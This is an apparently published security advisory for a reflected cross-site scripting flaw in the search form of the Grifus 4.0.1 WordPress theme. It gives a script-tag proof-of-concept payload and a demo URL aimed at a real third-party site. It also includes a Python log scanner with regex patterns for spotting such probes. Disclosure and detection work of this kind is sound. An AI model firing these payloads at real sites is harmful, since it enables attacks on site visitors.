WordPress Grifus 4.0.1 Cross Site Scripting

2017.12.22
Credit: Sajibe Kanti
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

======
Title: Grifus WordPress Themes XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus is a WordPress theme for movie websites. The theme's search form reflects the search term back into the page, so a script payload entered there is executed.

POC:
========
1. Go to the target site.
2. Click the search box.
3. Enter this payload in the search box: " <script>prompt(document.domain)</script> "
4. Observe that the XSS is executed.

Demo:
======
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.domain%29%3C%2Fscript%3E

Mitigations
================
Update the theme.

--
Thanks
Sajibe Kanti
Independent Web Security Researcher
<https://twitter.com/Sajibekantibd>
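The demo URL above shows the probe as it appears on the wire: the payload URL-encoded in the WordPress search parameter `s`. As an added detection example (not part of the advisory, and not the theme's code), the following scans access-log lines in Common Log Format, decodes the `s` parameter (repeatedly, so double-encoded variants are caught), and flags requests carrying script markup; the log lines are constructed samples.

```python
# Added example: flag reflected-XSS probes against the WordPress search
# parameter `s` in web-server access logs (Common Log Format assumed).
import re
from html import unescape
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Script markup to look for once the value is fully decoded.
XSS_MARKERS = re.compile(
    r"<\s*script|javascript\s*:|<\s*[a-z]+[^>]*\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# Request line inside a CLF entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (first and third carry probes, second is benign).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Dec/2017:10:00:01 +0100] "GET /?s=%3Cscript%3Eprompt%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.5 - - [22/Dec/2017:10:00:07 +0100] "GET /?s=action+movies HTTP/1.1" 200 4810',
    '198.51.100.9 - - [22/Dec/2017:10:01:15 +0100] "GET /?s=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 4911',
    '198.51.100.9 - - [22/Dec/2017:10:02:00 +0100] "GET /wp-login.php HTTP/1.1" 200 2301',
]


def decode_param(value: str, rounds: int = 3) -> str:
    """Undo URL-encoding (repeated, to catch double-encoding) and HTML entities."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return unescape(value)


def search_xss_findings(log_lines):
    """Return (line_no, decoded search term) for requests whose `s` value contains script markup."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs already performs one round of URL-decoding.
        for term in parse_qs(query, keep_blank_values=True).get("s", []):
            decoded = decode_param(term)
            if XSS_MARKERS.search(decoded):
                findings.append((line_no, decoded))
    return findings


if __name__ == "__main__":
    for line_no, term in search_xss_findings(SAMPLE_LOG):
        print(f"line {line_no}: suspicious search term {term!r}")
```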



Copyright 2018, cxsecurity.com
